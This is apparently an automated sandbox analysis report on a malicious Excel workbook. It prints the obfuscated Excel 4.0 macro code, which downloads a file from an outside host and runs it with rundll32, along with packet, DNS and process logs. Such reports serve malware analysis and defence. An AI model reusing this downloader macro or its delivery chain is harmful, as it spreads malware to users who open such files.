                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 83101
                                                                                                                                                      General
                                                                                                                                                      Stream Path:Workbook
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Stream Size:83101
                                                                                                                                                      Entropy:3.68114146554
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                                                                                                                                                      Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(Doc2!AS110&Doc2!AS111&""2 "",AD15)","=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&FORMULA(Doc2!AT110,AE15)","=FORMULA(Doc2!AV105&Doc2!AV107&Doc2!AV109,AF15)",,,,,,,,,,,,,,,,=AE14(),=before.2.6.28.sheet!AD19(),=AJ19(),,,,,,,,,=before.2.6.28.sheet!AF20(),,,,,,,,,,,,,,,,"=REPLACE(Doc2!AP102&Doc2!AQ102,6,1,before.2.6.28.sheet!AE19)",,,,,,"=REPLACE(Doc2!AT94,6,1,Doc2!AT95)",,"=CALL(AF15,before.2.6.28.sheet!AD21&before.2.6.28.sheet!AD20&before.2.6.28.sheet!AD19&""A"",""JJC""&""CBB"",0,Doc3!A100,""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&Doc2!AT99,0)","=REPLACE(Doc2!AP103,7,7,Doc2!AP101&Doc2!AQ101)",,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&EXEC(before.2.6.28.sheet!AD15&Doc2!AT99&before.2.6.28.sheet!AE15&AJ19)",,,,=AL19(),,=AF17(),"=REPLACE(Doc2!AP104&Doc2!AQ104&Doc2!AR104,7,7,"""")",,=HALT(),,,,,,,=before.2.6.28.sheet!AF14(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Feb 22, 2021 20:42:12.669931889 CET49715443192.168.2.6208.91.199.118
                                                                                                                                                      Feb 22, 2021 20:42:12.849178076 CET44349715208.91.199.118192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:12.849267960 CET49715443192.168.2.6208.91.199.118
                                                                                                                                                      Feb 22, 2021 20:42:12.850610971 CET49715443192.168.2.6208.91.199.118
                                                                                                                                                      Feb 22, 2021 20:42:13.025353909 CET44349715208.91.199.118192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:13.032205105 CET44349715208.91.199.118192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:13.032239914 CET44349715208.91.199.118192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:13.032257080 CET44349715208.91.199.118192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:13.032354116 CET49715443192.168.2.6208.91.199.118
                                                                                                                                                      Feb 22, 2021 20:42:13.032394886 CET49715443192.168.2.6208.91.199.118
                                                                                                                                                      Feb 22, 2021 20:42:13.049576044 CET49715443192.168.2.6208.91.199.118
                                                                                                                                                      Feb 22, 2021 20:42:13.224641085 CET44349715208.91.199.118192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:13.224726915 CET49715443192.168.2.6208.91.199.118
                                                                                                                                                      Feb 22, 2021 20:42:13.225673914 CET49715443192.168.2.6208.91.199.118
                                                                                                                                                      Feb 22, 2021 20:42:13.440907955 CET44349715208.91.199.118192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:13.710346937 CET44349715208.91.199.118192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:13.710520983 CET49715443192.168.2.6208.91.199.118
                                                                                                                                                      Feb 22, 2021 20:42:13.710721970 CET44349715208.91.199.118192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:13.710808992 CET49715443192.168.2.6208.91.199.118
                                                                                                                                                      Feb 22, 2021 20:42:13.711721897 CET49715443192.168.2.6208.91.199.118
                                                                                                                                                      Feb 22, 2021 20:42:13.876683950 CET44349715208.91.199.118192.168.2.6

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Feb 22, 2021 20:41:54.079983950 CET5893153192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:41:54.128581047 CET53589318.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:41:54.933238983 CET5772553192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:41:54.995094061 CET53577258.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:41:55.008296013 CET4928353192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:41:55.068291903 CET53492838.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:41:55.934096098 CET5837753192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:41:55.982882023 CET53583778.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:41:56.073215961 CET5507453192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:41:56.148809910 CET53550748.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:41:56.927624941 CET5451353192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:41:56.978405952 CET53545138.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:41:57.620075941 CET6204453192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:41:57.678818941 CET53620448.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:41:57.764069080 CET6379153192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:41:57.815642118 CET53637918.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:41:59.115533113 CET6426753192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:41:59.164485931 CET53642678.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:00.223270893 CET4944853192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:00.275995970 CET53494488.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:01.492991924 CET6034253192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:01.544889927 CET53603428.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:06.938477993 CET6134653192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:06.987284899 CET53613468.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:08.138809919 CET5177453192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:08.197880030 CET53517748.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:08.619647026 CET5602353192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:08.678550959 CET53560238.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:08.741874933 CET5838453192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:08.801960945 CET53583848.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:09.635478020 CET5602353192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:09.684024096 CET53560238.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:10.652235031 CET5602353192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:10.709604025 CET53560238.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:12.607428074 CET6026153192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:12.666680098 CET5602353192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:12.667346954 CET53602618.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:12.724898100 CET53560238.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:12.793123007 CET5606153192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:12.841562033 CET53560618.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:13.841588974 CET5833653192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:13.893126011 CET53583368.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:15.613415956 CET5378153192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:15.662364960 CET53537818.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:16.674047947 CET5602353192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:16.733736992 CET53560238.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:17.342061043 CET5406453192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:17.392210960 CET53540648.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:18.849492073 CET5281153192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:18.898072958 CET53528118.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:20.687793970 CET5529953192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:20.752904892 CET53552998.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:21.688097954 CET6374553192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:21.736864090 CET53637458.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:22.692171097 CET5005553192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:22.743626118 CET53500558.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:23.848877907 CET6137453192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:23.900346041 CET53613748.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:24.900619030 CET5033953192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:24.952198029 CET53503398.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:31.896629095 CET6330753192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:31.948199987 CET53633078.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:49.185609102 CET4969453192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:49.247133970 CET53496948.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:52.359832048 CET5498253192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:52.421720982 CET53549828.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:52.983937025 CET5001053192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:53.088752985 CET53500108.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:53.703151941 CET6371853192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:53.760521889 CET53637188.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:53.914345980 CET6211653192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:53.985183001 CET53621168.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:54.210052013 CET6381653192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:54.258663893 CET53638168.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:54.717310905 CET5501453192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:54.774591923 CET53550148.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:55.090550900 CET6220853192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:55.142160892 CET53622088.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:55.318674088 CET5757453192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:55.382422924 CET53575748.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:55.972788095 CET5181853192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:56.032193899 CET53518188.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:57.298429012 CET5662853192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:57.361011028 CET53566288.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:58.209419966 CET6077853192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:58.272738934 CET53607788.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:42:58.762094975 CET5379953192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:42:58.824748993 CET53537998.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:43:04.198642015 CET5468353192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:43:04.261590004 CET53546838.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:43:32.759322882 CET5932953192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:43:32.819816113 CET53593298.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:43:32.988835096 CET6402153192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:43:33.037535906 CET53640218.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:43:33.491377115 CET5612953192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:43:33.556948900 CET53561298.8.8.8192.168.2.6
                                                                                                                                                      Feb 22, 2021 20:43:56.209891081 CET5817753192.168.2.68.8.8.8
                                                                                                                                                      Feb 22, 2021 20:43:56.262593031 CET53581778.8.8.8192.168.2.6

                                                                                                                                                      DNS Queries

                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                      Feb 22, 2021 20:42:12.607428074 CET192.168.2.68.8.8.80x56c4Standard query (0)helendunnosteopathy.co.ukA (IP address)IN (0x0001)

                                                                                                                                                      DNS Answers

                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                      Feb 22, 2021 20:42:12.667346954 CET8.8.8.8192.168.2.60x56c4No error (0)helendunnosteopathy.co.uk208.91.199.118A (IP address)IN (0x0001)

                                                                                                                                                      HTTPS Packets

                                                                                                                                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                      Feb 22, 2021 20:42:13.032257080 CET208.91.199.118443192.168.2.649715CN=cpcalendars.helendunnosteopathy.co.uk CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Jan 30 12:12:51 CET 2021 Wed Oct 07 21:21:40 CEST 2020Fri Apr 30 13:12:51 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                      CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      CPU Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      Memory Usage

                                                                                                                                                      Click to jump to process

                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:20:42:06
                                                                                                                                                      Start date:22/02/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0x11d0000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:20:42:13
                                                                                                                                                      Start date:22/02/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:rundll32 ..\rieuro.vnt,DllRegisterServer
                                                                                                                                                      Imagebase:0x1020000
                                                                                                                                                      File size:61952 bytes
                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >